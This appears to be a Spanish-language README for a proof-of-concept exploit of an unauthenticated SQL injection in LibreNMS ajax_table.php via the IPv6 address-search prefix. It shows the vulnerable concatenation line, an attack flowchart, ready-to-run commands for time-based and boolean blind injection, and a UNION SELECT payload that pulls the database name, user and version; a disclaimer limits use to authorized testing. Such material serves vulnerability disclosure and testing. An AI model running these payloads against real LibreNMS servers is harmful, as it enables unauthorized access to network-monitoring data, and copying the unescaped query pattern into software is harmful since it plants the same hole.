
Prueba de concepto de explotación para inyección SQL no autenticada en LibreNMS ajax_table.php, que demuestra técnicas de inyección ciega basadas en tiempo y en booleanos para pruebas de seguridad autorizadas.
Inyección SQL no autenticada en ajax_table.php de LibreNMS a través del parámetro de búsqueda de direcciones IPv6.
15429580baba03ed1dd377bada1bde4b7a1175a1)CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:NEl parámetro address cuando search_type=ipv6 se divide por / en dirección y prefijo.
El prefijo se concatena directamente en una consulta SQL sin escape:
$sql .= " AND ipv6_prefixlen = '$prefix'";
Una comilla simple (') en la parte del prefijo permite salir del literal de cadena → inyección SQL arbitraria.
flowchart TD
A[Atacante] -->|1. HTTP POST a /ajax_table.php| B[Servidor Web LibreNMS]
B -->|2. id=address-search & search_type=ipv6| C[Analizar parámetro address]
C -->|3. Dividir por '/' → $address / $prefix| D[Construir SQL vulnerable]
D -->|4. Concatenar: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
E -->|5. Ejecutar consulta inyectada| F[Devolver resultados / error / retardo]
F -->|6. El atacante observa la respuesta / el tiempo| A
subgraph "Punto de Inyección"
D
end
style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff
requests (pip install requests)python3 exploit.py http://target/librenms --test
python3 exploit.py http://192.168.1.50/librenms --time
→ Si la respuesta tarda más de 5–6 segundos → vulnerable
python3 exploit.py http://target/librenms --boolean
python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
exploit.py .............. Script principal del PoC (renombrar desde cve-2026-26988-poc.py si es necesario)README.md ............... Este archivo15429580baba... → PR #18777Este prueba de concepto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
NO utilice este código contra ningún sistema o red sin permiso explícito por escrito del propietario.
El uso no autorizado puede violar leyes, incluidas (entre otras) la Computer Fraud and Abuse Act (CFAA) en EE. UU., o legislación equivalente en su país.
Úselo bajo su propio riesgo.
Autor: Mohammed Idrees Banyamer
Instagram: @banyamer_security
Fecha: 20 de febrero de 2026